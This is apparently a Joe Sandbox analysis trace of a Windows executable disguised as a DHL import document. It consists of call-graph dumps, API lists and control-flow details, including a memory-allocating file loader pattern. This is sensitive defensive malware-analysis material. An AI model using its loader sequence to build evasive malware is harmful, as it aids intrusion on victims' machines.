96781->96783 96880 7d50f5 96782->96880 96784 7d4f39 68 API calls 96783->96784 96786 7d2ea5 96784->96786 96786->96686 96786->96687 96789 813d05 96790->96693 96791->96696 96792->96701 96793->96711 96794->96719 96795->96723 96796->96728 96797->96733 96798->96736 96799->96740 96800->96744 96801->96737 96802->96743 96803->96747 96804->96751 96805->96751 96806->96751 96807->96751 96809 842d15 96808->96809 96810 7d511f 64 API calls 96809->96810 96811 842d29 96810->96811 97011 842e66 96811->97011 96814 7d50f5 40 API calls 96815 842d56 96814->96815 96816 7d50f5 40 API calls 96815->96816 96817 842d66 96816->96817 96818 7d50f5 40 API calls 96817->96818 96819 842d81 96818->96819 96820 7d50f5 40 API calls 96819->96820 96821 842d9c 96820->96821 96822 7d511f 64 API calls 96821->96822 96823 842db3 96822->96823 96824 7fea0c ___std_exception_copy 21 API calls 96823->96824 96825 842dba 96824->96825 96826 7fea0c ___std_exception_copy 21 API calls 96825->96826 96827 842dc4 96826->96827 96828 7d50f5 40 API calls 96827->96828 96829 842dd8 96828->96829 96830 8428fe 27 API calls 96829->96830 96832 842dee 96830->96832 96831 842d3f 96831->96689 96832->96831 97017 8422ce 96832->97017 96835 7d4f4a 96834->96835 96836 7d4f43 96834->96836 96838 7d4f59 96835->96838 96839 7d4f6a FreeLibrary 96835->96839 96837 7fe678 67 API calls 96836->96837 96837->96835 96838->96690 96839->96838 96840->96703 96841->96707 96842->96713 96843->96718 96844->96722 96845->96727 96846->96731 96848 7daec9 22 API calls 96847->96848 96849 7d4c78 96848->96849 96849->96757 96851 7d4ea8 GetProcAddress 96850->96851 96852 7d4ec6 96850->96852 96853 7d4eb8 96851->96853 96855 7fe5eb 96852->96855 96853->96852 96854 7d4ebf FreeLibrary 96853->96854 96854->96852 96888 7fe52a 96855->96888 96857 7d4eea 96857->96773 96857->96774 96859 7d4e8d 96858->96859 96860 7d4e6e GetProcAddress 96858->96860 96863 7d4f80 96859->96863 96861 7d4e7e 96860->96861 96861->96859 96862 7d4e86 FreeLibrary 96861->96862 96862->96859 96864 7efe0b 22 API calls 96863->96864 96865 7d4f95 96864->96865 96866 7d5722 22 API calls 96865->96866 96867 7d4fa1 __fread_nolock 96866->96867 96868 7d50a5 96867->96868 96869 813d1d 96867->96869 96879 7d4fdc 96867->96879 96940 7d42a2 CreateStreamOnHGlobal 96868->96940 96951 84304d 74 API calls 96869->96951 96872 813d22 96874 7d511f 64 API calls 96872->96874 96873 7d50f5 40 API calls 96873->96879 96875 813d45 96874->96875 96876 7d50f5 40 API calls 96875->96876 96878 7d506e ISource 96876->96878 96878->96781 96879->96872 96879->96873 96879->96878 96946 7d511f 96879->96946 96881 813d70 96880->96881 96882 7d5107 96880->96882 96973 7fe8c4 96882->96973 96885 8428fe 96994 84274e 96885->96994 96887 842919 96887->96789 96891 7fe536 BuildCatchObjectHelperInternal 96888->96891 96889 7fe544 96913 7ff2d9 20 API calls __dosmaperr 96889->96913 96891->96889 96893 7fe574 96891->96893 96892 7fe549 96914 8027ec 26 API calls __wsopen_s 96892->96914 96894 7fe579 96893->96894 96895 7fe586 96893->96895 96915 7ff2d9 20 API calls __dosmaperr 96894->96915 96905 808061 96895->96905 96899 7fe58f 96900 7fe595 96899->96900 96901 7fe5a2 96899->96901 96916 7ff2d9 20 API calls __dosmaperr 96900->96916 96917 7fe5d4 LeaveCriticalSection __fread_nolock 96901->96917 96902 7fe554 __wsopen_s 96902->96857 96906 80806d BuildCatchObjectHelperInternal 96905->96906 96918 802f5e EnterCriticalSection 96906->96918 96908 80807b 96919 8080fb 96908->96919 96912 8080ac __wsopen_s 96912->96899 96913->96892 96914->96902 96915->96902 96916->96902 96917->96902 96918->96908 96920 80811e 96919->96920 96921 808177 96920->96921 96928 808088 96920->96928 96935 7f918d EnterCriticalSection 96920->96935 96936 7f91a1 LeaveCriticalSection 96920->96936 96922 804c7d __dosmaperr 20 API calls 96921->96922 96923 808180 96922->96923 96925 8029c8 _free 20 API calls 96923->96925 96926 808189 96925->96926 96926->96928 96937 803405 11 API calls 2 library calls 96926->96937 96932 8080b7 96928->96932 96929 8081a8 96938 7f918d EnterCriticalSection 96929->96938 96939 802fa6 LeaveCriticalSection 96932->96939 96934 8080be 96934->96912 96935->96920 96936->96920 96937->96929 96938->96928 96939->96934 96941 7d42bc FindResourceExW 96940->96941 96942 7d42d9 96940->96942 96941->96942 96943 8135ba LoadResource 96941->96943 96942->96879 96943->96942 96944 8135cf SizeofResource 96943->96944 96944->96942 96945 8135e3 LockResource 96944->96945 96945->96942 96947 7d512e 96946->96947 96949 813d90 96946->96949 96952 7fece3 96947->96952 96951->96872 96955 7feaaa 96952->96955 96954 7d513c 96954->96879 96957 7feab6 BuildCatchObjectHelperInternal 96955->96957 96956 7feac2 96968 7ff2d9 20 API calls __dosmaperr 96956->96968 96957->96956 96958 7feae8 96957->96958 96970 7f918d EnterCriticalSection 96958->96970 96961 7feac7 96969 8027ec 26 API calls __wsopen_s 96961->96969 96963 7feaf4 96971 7fec0a 62 API calls 2 library calls 96963->96971 96965 7feb08 96972 7feb27 LeaveCriticalSection __fread_nolock 96965->96972 96967 7fead2 __wsopen_s 96967->96954 96968->96961 96969->96967 96970->96963 96971->96965 96972->96967 96976 7fe8e1 96973->96976 96975 7d5118 96975->96885 96977 7fe8ed BuildCatchObjectHelperInternal 96976->96977 96978 7fe92d 96977->96978 96979 7fe900 ___scrt_fastfail 96977->96979 96980 7fe925 __wsopen_s 96977->96980 96991 7f918d EnterCriticalSection 96978->96991 96989 7ff2d9 20 API calls __dosmaperr 96979->96989 96980->96975 96982 7fe937 96992 7fe6f8 38 API calls 4 library calls 96982->96992 96985 7fe91a 96990 8027ec 26 API calls __wsopen_s 96985->96990 96986 7fe94e 96993 7fe96c LeaveCriticalSection __fread_nolock 96986->96993 96989->96985 96990->96980 96991->96982 96992->96986 96993->96980 96997 7fe4e8 96994->96997 96996 84275d 96996->96887 97000 7fe469 96997->97000 96999 7fe505 96999->96996 97001 7fe478 97000->97001 97003 7fe48c 97000->97003 97008 7ff2d9 20 API calls __dosmaperr 97001->97008 97007 7fe488 __alldvrm 97003->97007 97010 80333f 11 API calls 2 library calls 97003->97010 97004 7fe47d 97009 8027ec 26 API calls __wsopen_s 97004->97009 97007->96999 97008->97004 97009->97007 97010->97007 97013 842e7a 97011->97013 97012 7d50f5 40 API calls 97012->97013 97013->97012 97014 8428fe 27 API calls 97013->97014 97015 842d3b 97013->97015 97016 7d511f 64 API calls 97013->97016 97014->97013 97015->96814 97015->96831 97016->97013 97018 8422d9 97017->97018 97020 8422e7 97017->97020 97019 7fe5eb 29 API calls 97018->97019 97019->97020 97021 84232c 97020->97021 97022 7fe5eb 29 API calls 97020->97022 97041 8422f0 97020->97041 97046 842557 40 API calls __fread_nolock 97021->97046 97024 842311 97022->97024 97024->97021 97026 84231a 97024->97026 97025 842370 97027 842374 97025->97027 97028 842395 97025->97028 97026->97041 97054 7fe678 97026->97054 97031 842381 97027->97031 97033 7fe678 67 API calls 97027->97033 97047 842171 97028->97047 97036 7fe678 67 API calls 97031->97036 97031->97041 97032 84239d 97034 8423c3 97032->97034 97035 8423a3 97032->97035 97033->97031 97067 8423f3 74 API calls 97034->97067 97037 8423b0 97035->97037 97039 7fe678 67 API calls 97035->97039 97036->97041 97040 7fe678 67 API calls 97037->97040 97037->97041 97039->97037 97040->97041 97041->96831 97042 8423ca 97043 8423de 97042->97043 97044 7fe678 67 API calls 97042->97044 97043->97041 97045 7fe678 67 API calls 97043->97045 97044->97043 97045->97041 97046->97025 97048 7fea0c ___std_exception_copy 21 API calls 97047->97048 97049 84217f 97048->97049 97050 7fea0c ___std_exception_copy 21 API calls 97049->97050 97051 842190 97050->97051 97052 7fea0c ___std_exception_copy 21 API calls 97051->97052 97053 84219c 97052->97053 97053->97032 97055 7fe684 BuildCatchObjectHelperInternal 97054->97055 97056 7fe6aa 97055->97056 97057 7fe695 97055->97057 97066 7fe6a5 __wsopen_s 97056->97066 97068 7f918d EnterCriticalSection 97056->97068 97085 7ff2d9 20 API calls __dosmaperr 97057->97085 97059 7fe69a 97086 8027ec 26 API calls __wsopen_s 97059->97086 97062 7fe6c6 97069 7fe602 97062->97069 97064 7fe6d1 97087 7fe6ee LeaveCriticalSection __fread_nolock 97064->97087 97066->97041 97067->97042 97068->97062 97070 7fe60f 97069->97070 97071 7fe624 97069->97071 97120 7ff2d9 20 API calls __dosmaperr 97070->97120 97076 7fe61f 97071->97076 97088 7fdc0b 97071->97088 97073 7fe614 97121 8027ec 26 API calls __wsopen_s 97073->97121 97076->97064 97081 7fe646 97105 80862f 97081->97105 97084 8029c8 _free 20 API calls 97084->97076 97085->97059 97086->97066 97087->97066 97089 7fdc23 97088->97089 97093 7fdc1f 97088->97093 97090 7fd955 __fread_nolock 26 API calls 97089->97090 97089->97093 97091 7fdc43 97090->97091 97122 8059be 62 API calls 3 library calls 97091->97122 97094 804d7a 97093->97094 97095 804d90 97094->97095 97096 7fe640 97094->97096 97095->97096 97097 8029c8 _free 20 API calls 97095->97097 97098 7fd955 97096->97098 97097->97096 97099 7fd976 97098->97099 97100 7fd961 97098->97100 97099->97081 97123 7ff2d9 20 API calls __dosmaperr 97100->97123 97102 7fd966 97124 8027ec 26 API calls __wsopen_s 97102->97124 97104 7fd971 97104->97081 97106 80863e 97105->97106 97108 808653 97105->97108 97128 7ff2c6 20 API calls __dosmaperr 97106->97128 97109 80868e 97108->97109 97112 80867a 97108->97112 97130 7ff2c6 20 API calls __dosmaperr 97109->97130 97111 808643 97129 7ff2d9 20 API calls __dosmaperr 97111->97129 97125 808607 97112->97125 97113 808693 97131 7ff2d9 20 API calls __dosmaperr 97113->97131 97117 7fe64c 97117->97076 97117->97084 97118 80869b 97132 8027ec 26 API calls __wsopen_s 97118->97132 97120->97073 97121->97076 97122->97093 97123->97102 97124->97104 97133 808585 97125->97133 97127 80862b 97127->97117 97128->97111 97129->97117 97130->97113 97131->97118 97132->97117 97134 808591 BuildCatchObjectHelperInternal 97133->97134 97144 805147 EnterCriticalSection 97134->97144 97136 80859f 97137 8085d1 97136->97137 97138 8085c6 97136->97138 97145 7ff2d9 20 API calls __dosmaperr 97137->97145 97140 8086ae __wsopen_s 29 API calls 97138->97140 97141 8085cc 97140->97141 97146 8085fb LeaveCriticalSection __wsopen_s 97141->97146 97143 8085ee __wsopen_s 97143->97127 97144->97136 97145->97141 97146->97143 97147 7d3156 97150 7d3170 97147->97150 97151 7d3187 97150->97151 97152 7d318c 97151->97152 97153 7d31eb 97151->97153 97194 7d31e9 97151->97194 97154 7d3199 97152->97154 97155 7d3265 PostQuitMessage 97152->97155 97157 812dfb 97153->97157 97158 7d31f1 97153->97158 97160 7d31a4 97154->97160 97161 812e7c 97154->97161 97191 7d316a 97155->97191 97156 7d31d0 DefWindowProcW 97156->97191 97206 7d18e2 10 API calls 97157->97206 97162 7d321d SetTimer RegisterWindowMessageW 97158->97162 97163 7d31f8 97158->97163 97165 7d31ae 97160->97165 97166 812e68 97160->97166 97211 83bf30 34 API calls ___scrt_fastfail 97161->97211 97167 7d3246 CreatePopupMenu 97162->97167 97162->97191 97169 7d3201 KillTimer 97163->97169 97170 812d9c 97163->97170 97164 812e1c 97207 7ee499 42 API calls 97164->97207 97174 7d31b9 97165->97174 97175 812e4d 97165->97175 97195 83c161 97166->97195 97167->97191 97202 7d30f2 Shell_NotifyIconW ___scrt_fastfail 97169->97202 97177 812da1 97170->97177 97178 812dd7 MoveWindow 97170->97178 97180 7d3253 97174->97180 97188 7d31c4 97174->97188 97175->97156 97210 830ad7 22 API calls 97175->97210 97176 812e8e 97176->97156 97176->97191 97181 812da7 97177->97181 97182 812dc6 SetFocus 97177->97182 97178->97191 97179 7d3214 97203 7d3c50 DeleteObject DestroyWindow 97179->97203 97204 7d326f 44 API calls ___scrt_fastfail 97180->97204 97186 812db0 97181->97186 97181->97188 97182->97191 97205 7d18e2 10 API calls 97186->97205 97187 7d3263 97187->97191 97188->97156 97208 7d30f2 Shell_NotifyIconW ___scrt_fastfail 97188->97208 97192 812e41 97209 7d3837 49 API calls ___scrt_fastfail 97192->97209 97194->97156 97196 83c276 97195->97196 97197 83c179 ___scrt_fastfail 97195->97197 97196->97191 97212 7d3923 97197->97212 97199 83c25f KillTimer SetTimer 97199->97196 97200 83c1a0 97200->97199 97201 83c251 Shell_NotifyIconW 97200->97201 97201->97199 97202->97179 97203->97191 97204->97187 97205->97191 97206->97164 97207->97188 97208->97192 97209->97194 97210->97194 97211->97176 97213 7d393f 97212->97213 97214 7d3a13 97212->97214 97234 7d6270 22 API calls 97213->97234 97214->97200 97216 7d394d 97217 813393 LoadStringW 97216->97217 97218 7d395a 97216->97218 97220 8133ad 97217->97220 97219 7d6b57 22 API calls 97218->97219 97221 7d396f 97219->97221 97228 7d3994 ___scrt_fastfail 97220->97228 97235 7da8c7 22 API calls __fread_nolock 97220->97235 97222 7d397c 97221->97222 97223 8133c9 97221->97223 97222->97220 97225 7d3986 97222->97225 97226 7d6350 22 API calls 97223->97226 97227 7d6350 22 API calls 97225->97227 97229 8133d7 97226->97229 97227->97228 97231 7d39f9 Shell_NotifyIconW 97228->97231 97229->97228 97230 7d33c6 22 API calls 97229->97230 97232 8133f9 97230->97232 97231->97214 97233 7d33c6 22 API calls 97232->97233 97233->97228 97234->97216 97235->97228 97236 7d1033 97241 7d4c91 97236->97241 97240 7d1042 97242 7da961 22 API calls 97241->97242 97243 7d4cff 97242->97243 97249 7d3af0 97243->97249 97246 7d4d9c 97247 7d1038 97246->97247 97252 7d51f7 22 API calls __fread_nolock 97246->97252 97248 7f00a3 29 API calls __onexit 97247->97248 97248->97240 97253 7d3b1c 97249->97253 97252->97246 97254 7d3b0f 97253->97254 97255 7d3b29 97253->97255 97254->97246 97255->97254 97256 7d3b30 RegOpenKeyExW 97255->97256 97256->97254 97257 7d3b4a RegQueryValueExW 97256->97257 97258 7d3b80 RegCloseKey 97257->97258 97259 7d3b6b 97257->97259 97258->97254 97259->97258 97260 3abc7fb 97263 3abc470 97260->97263 97262 3abc847 97276 3ab9ea0 97263->97276 97266 3abc540 CreateFileW 97268 3abc54d 97266->97268 97273 3abc50f 97266->97273 97267 3abc569 VirtualAlloc 97267->97268 97269 3abc58a ReadFile 97267->97269 97271 3abc76a 97268->97271 97272 3abc75c VirtualFree 97268->97272 97269->97268 97270 3abc5a8 VirtualAlloc 97269->97270 97270->97268 97270->97273 97271->97262 97272->97271 97273->97267 97273->97268 97274 3abc670 CloseHandle 97273->97274 97275 3abc680 VirtualFree 97273->97275 97279 3abd380 GetPEB 97273->97279 97274->97273 97275->97273 97281 3abd320 GetPEB 97276->97281 97278 3aba52b 97278->97273 97280 3abd3aa 97279->97280 97280->97266 97282 3abd34a 97281->97282 97282->97278 97283 7d1cad SystemParametersInfoW 97284 823f75 97295 7eceb1 97284->97295 97286 823f8b 97294 824006 97286->97294 97304 7ee300 23 API calls 97286->97304 97288 7dbf40 207 API calls 97289 824052 97288->97289 97292 824a88 97289->97292 97306 84359c 82 API calls __wsopen_s 97289->97306 97291 823fe6 97291->97289 97305 841abf 22 API calls 97291->97305 97294->97288 97296 7ecebf 97295->97296 97297 7eced2 97295->97297 97307 7daceb 23 API calls ISource 97296->97307 97299 7eced7 97297->97299 97300 7ecf05 97297->97300 97302 7efddb 22 API calls 97299->97302 97308 7daceb 23 API calls ISource 97300->97308 97303 7ecec9 97302->97303 97303->97286 97304->97291 97305->97294 97306->97292 97307->97303 97308->97303 97309 7ddee5 97312 7db710 97309->97312 97313 7db72b 97312->97313 97314 820146 97313->97314 97315 8200f8 97313->97315 97328 7db750 97313->97328 97354 8558a2 207 API calls 2 library calls 97314->97354 97319 820102 97315->97319 97322 82010f 97315->97322 97315->97328 97318 7dba20 97331 7dba4e 97318->97331 97359 84359c 82 API calls __wsopen_s 97318->97359 97352 855d33 207 API calls 97319->97352 97322->97318 97353 8561d0 207 API calls 2 library calls 97322->97353 97325 7ed336 40 API calls 97325->97328 97326 8203d9 97326->97326 97328->97318 97328->97325 97328->97331 97332 820322 97328->97332 97339 7dbbe0 40 API calls 97328->97339 97340 7dec40 207 API calls 97328->97340 97343 7da81b 41 API calls 97328->97343 97344 7ed2f0 40 API calls 97328->97344 97345 7ea01b 207 API calls 97328->97345 97346 7f0242 5 API calls __Init_thread_wait 97328->97346 97347 7eedcd 22 API calls 97328->97347 97348 7f00a3 29 API calls __onexit 97328->97348 97349 7f01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97328->97349 97350 7eee53 82 API calls 97328->97350 97351 7ee5ca 207 API calls 97328->97351 97355 7daceb 23 API calls ISource 97328->97355 97356 82f6bf 23 API calls 97328->97356 97357 7da8c7 22 API calls __fread_nolock 97328->97357 97358 855c0c 82 API calls 97332->97358 97339->97328 97340->97328 97343->97328 97344->97328 97345->97328 97346->97328 97347->97328 97348->97328 97349->97328 97350->97328 97351->97328 97352->97322 97353->97318 97354->97328 97355->97328 97356->97328 97357->97328 97358->97318 97359->97326 97360 7d1044 97365 7d10f3 97360->97365 97362 7d104a 97401 7f00a3 29 API calls __onexit 97362->97401 97364 7d1054 97402 7d1398 97365->97402 97369 7d116a 97370 7da961 22 API calls 97369->97370 97371 7d1174 97370->97371 97372 7da961 22 API calls 97371->97372 97373 7d117e 97372->97373 97374 7da961 22 API calls 97373->97374 97375 7d1188 97374->97375 97376 7da961 22 API calls 97375->97376 97377 7d11c6 97376->97377 97378 7da961 22 API calls 97377->97378 97379 7d1292 97378->97379 97412 7d171c 97379->97412 97383 7d12c4 97384 7da961 22 API calls 97383->97384 97385 7d12ce 97384->97385 97386 7e1940 9 API calls 97385->97386 97387 7d12f9 97386->97387 97433 7d1aab 97387->97433 97389 7d1315 97390 7d1325 GetStdHandle 97389->97390 97391 812485 97390->97391 97392 7d137a 97390->97392 97391->97392 97393 81248e 97391->97393 97395 7d1387 OleInitialize 97392->97395 97394 7efddb 22 API calls 97393->97394 97396 812495 97394->97396 97395->97362 97440 84011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97396->97440 97398 81249e 97441 840944 CreateThread 97398->97441 97400 8124aa CloseHandle 97400->97392 97401->97364 97442 7d13f1 97402->97442 97405 7d13f1 22 API calls 97406 7d13d0 97405->97406 97407 7da961 22 API calls 97406->97407 97408 7d13dc 97407->97408 97409 7d6b57 22 API calls 97408->97409 97410 7d1129 97409->97410 97411 7d1bc3 6 API calls 97410->97411 97411->97369 97413 7da961 22 API calls 97412->97413 97414 7d172c 97413->97414 97415 7da961 22 API calls 97414->97415 97416 7d1734 97415->97416 97417 7da961 22 API calls 97416->97417 97418 7d174f 97417->97418 97419 7efddb 22 API calls 97418->97419 97420 7d129c 97419->97420 97421 7d1b4a 97420->97421 97422 7d1b58 97421->97422 97423 7da961 22 API calls 97422->97423 97424 7d1b63 97423->97424 97425 7da961 22 API calls 97424->97425 97426 7d1b6e 97425->97426 97427 7da961 22 API calls 97426->97427 97428 7d1b79 97427->97428 97429 7da961 22 API calls 97428->97429 97430 7d1b84 97429->97430 97431 7efddb 22 API calls 97430->97431 97432 7d1b96 RegisterWindowMessageW 97431->97432 97432->97383 97434 7d1abb 97433->97434 97435 81272d 97433->97435 97436 7efddb 22 API calls 97434->97436 97449 843209 23 API calls 97435->97449 97438 7d1ac3 97436->97438 97438->97389 97439 812738 97440->97398 97441->97400 97450 84092a 28 API calls 97441->97450 97443 7da961 22 API calls 97442->97443 97444 7d13fc 97443->97444 97445 7da961 22 API calls 97444->97445 97446 7d1404 97445->97446 97447 7da961 22 API calls 97446->97447 97448 7d13c6 97447->97448 97448->97405 97449->97439 97451 3abc250 97452 3ab9ea0 GetPEB 97451->97452 97453 3abc2f1 97452->97453 97465 3abc140 97453->97465 97455 3abc31a CreateFileW 97457 3abc36e 97455->97457 97458 3abc369 97455->97458 97457->97458 97459 3abc385 VirtualAlloc 97457->97459 97459->97458 97460 3abc3a3 ReadFile 97459->97460 97460->97458 97461 3abc3be 97460->97461 97462 3abb140 13 API calls 97461->97462 97463 3abc3f1 97462->97463 97464 3abc414 ExitProcess 97463->97464 97464->97458 97466 3abc149 Sleep 97465->97466 97467 3abc157 97466->97467 97468 7dddc0 97471 7daa19 97468->97471 97470 7dddcc 97472 7daa3a 97471->97472 97479 7daa8f 97471->97479 97473 7dec40 207 API calls 97472->97473 97472->97479 97475 7daa6b 97473->97475 97477 7daabe 97475->97477 97480 7daceb 23 API calls ISource 97475->97480 97476 81f907 97476->97476 97477->97470 97479->97477 97481 84359c 82 API calls __wsopen_s 97479->97481 97480->97479 97481->97476 97482 7d2de3 97483 7d2df0 __wsopen_s 97482->97483 97484 7d2e09 97483->97484 97485 812c2b ___scrt_fastfail 97483->97485 97486 7d3aa2 23 API calls 97484->97486 97487 812c47 GetOpenFileNameW 97485->97487 97488 7d2e12 97486->97488 97489 812c96 97487->97489 97498 7d2da5 97488->97498 97491 7d6b57 22 API calls 97489->97491 97494 812cab 97491->97494 97494->97494 97495 7d2e27 97516 7d44a8 97495->97516 97499 811f50 __wsopen_s 97498->97499 97500 7d2db2 GetLongPathNameW 97499->97500 97501 7d6b57 22 API calls 97500->97501 97502 7d2dda 97501->97502 97503 7d3598 97502->97503 97504 7da961 22 API calls 97503->97504 97505 7d35aa 97504->97505 97506 7d3aa2 23 API calls 97505->97506 97507 7d35b5 97506->97507 97508 7d35c0 97507->97508 97514 8132eb 97507->97514 97509 7d515f 22 API calls 97508->97509 97511 7d35cc 97509->97511 97546 7d35f3 97511->97546 97513 81330d 97514->97513 97552 7ece60 41 API calls 97514->97552 97515 7d35df 97515->97495 97517 7d4ecb 94 API calls 97516->97517 97518 7d44cd 97517->97518 97519 813833 97518->97519 97521 7d4ecb 94 API calls 97518->97521 97520 842cf9 80 API calls 97519->97520 97522 813848 97520->97522 97523 7d44e1 97521->97523 97524 813869 97522->97524 97525 81384c 97522->97525 97523->97519 97526 7d44e9 97523->97526 97530 7efe0b 22 API calls 97524->97530 97529 7d4f39 68 API calls 97525->97529 97527 813854 97526->97527 97528 7d44f5 97526->97528 97577 83da5a 82 API calls 97527->97577 97576 7d940c 136 API calls 2 library calls 97528->97576 97529->97527 97539 8138ae 97530->97539 97533 7d2e31 97534 813862 97534->97524 97535 813a5f 97541 813a67 97535->97541 97536 7d4f39 68 API calls 97536->97541 97539->97535 97539->97541 97543 7d9cb3 22 API calls 97539->97543 97553 83967e 97539->97553 97556 840b5a 97539->97556 97562 7da4a1 97539->97562 97570 7d3ff7 97539->97570 97578 8395ad 42 API calls _wcslen 97539->97578 97541->97536 97579 83989b 82 API calls __wsopen_s 97541->97579 97543->97539 97547 7d3605 97546->97547 97551 7d3624 __fread_nolock 97546->97551 97549 7efe0b 22 API calls 97547->97549 97548 7efddb 22 API calls 97550 7d363b 97548->97550 97549->97551 97550->97515 97551->97548 97552->97514 97554 7efe0b 22 API calls 97553->97554 97555 8396ae __fread_nolock 97554->97555 97555->97539 97557 840b65 97556->97557 97558 7efddb 22 API calls 97557->97558 97559 840b7c 97558->97559 97560 7d9cb3 22 API calls 97559->97560 97561 840b87 97560->97561 97561->97539 97563 7da52b 97562->97563 97569 7da4b1 __fread_nolock 97562->97569 97565 7efe0b 22 API calls 97563->97565 97564 7efddb 22 API calls 97566 7da4b8 97564->97566 97565->97569 97567 7efddb 22 API calls 97566->97567 97568 7da4d6 97566->97568 97567->97568 97568->97539 97569->97564 97571 7d400a 97570->97571 97573 7d40ae 97570->97573 97572 7efe0b 22 API calls 97571->97572 97575 7d403c 97571->97575 97572->97575 97573->97539 97574 7efddb 22 API calls 97574->97575 97575->97573 97575->97574 97576->97533 97577->97534 97578->97539 97579->97541

                                                                                          Executed Functions

                                                                                          Function 007D42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 239 7d42de-7d434d call 7da961 GetVersionExW call 7d6b57 244 813617-81362a 239->244 245 7d4353 239->245 246 81362b-81362f 244->246 247 7d4355-7d4357 245->247 248 813631 246->248 249 813632-81363e 246->249 250 7d435d-7d43bc call 7d93b2 call 7d37a0 247->250 251 813656 247->251 248->249 249->246 252 813640-813642 249->252 265 8137df-8137e6 250->265 266 7d43c2-7d43c4 250->266 255 81365d-813660 251->255 252->247 254 813648-81364f 252->254 254->244 257 813651 254->257 258 7d441b-7d4435 GetCurrentProcess IsWow64Process 255->258 259 813666-8136a8 255->259 257->251 262 7d4494-7d449a 258->262 263 7d4437 258->263 259->258 264 8136ae-8136b1 259->264 267 7d443d-7d4449 262->267 263->267 268 8136b3-8136bd 264->268 269 8136db-8136e5 264->269 273 813806-813809 265->273 274 8137e8 265->274 266->255 272 7d43ca-7d43dd 266->272 277 7d444f-7d445e LoadLibraryA 267->277 278 813824-813828 GetSystemInfo 267->278 270 8136ca-8136d6 268->270 271 8136bf-8136c5 268->271 275 8136e7-8136f3 269->275 276 8136f8-813702 269->276 270->258 271->258 279 813726-81372f 272->279 280 7d43e3-7d43e5 272->280 284 8137f4-8137fc 273->284 285 81380b-81381a 273->285 281 8137ee 274->281 275->258 282 813715-813721 276->282 283 813704-813710 276->283 286 7d449c-7d44a6 GetSystemInfo 277->286 287 7d4460-7d446e GetProcAddress 277->287 291 813731-813737 279->291 292 81373c-813748 279->292 289 7d43eb-7d43ee 280->289 290 81374d-813762 280->290 281->284 282->258 283->258 284->273 285->281 293 81381c-813822 285->293 288 7d4476-7d4478 286->288 287->286 294 7d4470-7d4474 GetNativeSystemInfo 287->294 299 7d447a-7d447b FreeLibrary 288->299 300 7d4481-7d4493 288->300 295 813791-813794 289->295 296 7d43f4-7d440f 289->296 297 813764-81376a 290->297 298 81376f-81377b 290->298 291->258 292->258 293->284 294->288 295->258 303 81379a-8137c1 295->303 301 813780-81378c 296->301 302 7d4415 296->302 297->258 298->258 299->300 301->258 302->258 304 8137c3-8137c9 303->304 305 8137ce-8137da 303->305 304->258 305->258
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 007D430D
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • GetCurrentProcess.KERNEL32(?,0086CB64,00000000,?,?), ref: 007D4422
                                                                                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 007D4429
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 007D4454
                                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 007D4466
                                                                                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 007D4474
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 007D447B
                                                                                          • GetSystemInfo.KERNEL32(?,?,?), ref: 007D44A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                          • API String ID: 3290436268-3101561225
                                                                                          • Opcode ID: ee3f4a6a926c8bf292596d7f0e9f2a3aae4329d8b9773f22be47a019df898c57
                                                                                          • Instruction ID: a0bfde3303356c2782a714f7c07fb27f96d89510e44a877b3861aefe5fd81f6a
                                                                                          • Opcode Fuzzy Hash: ee3f4a6a926c8bf292596d7f0e9f2a3aae4329d8b9773f22be47a019df898c57
                                                                                          • Instruction Fuzzy Hash: 1AA1936590A2C0DFEF11CF69BC491E67FB8BB27340F1858AAD18197F61D67C4988CB21
                                                                                          Function 007D42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 558 7d42a2-7d42ba CreateStreamOnHGlobal 559 7d42bc-7d42d3 FindResourceExW 558->559 560 7d42da-7d42dd 558->560 561 7d42d9 559->561 562 8135ba-8135c9 LoadResource 559->562 561->560 562->561 563 8135cf-8135dd SizeofResource 562->563 563->561 564 8135e3-8135ee LockResource 563->564 564->561 565 8135f4-8135fc 564->565 566 813600-813612 565->566 566->561
                                                                                          APIs
                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007D50AA,?,?,00000000,00000000), ref: 007D42B2
                                                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007D50AA,?,?,00000000,00000000), ref: 007D42C9
                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,007D50AA,?,?,00000000,00000000,?,?,?,?,?,?,007D4F20), ref: 008135BE
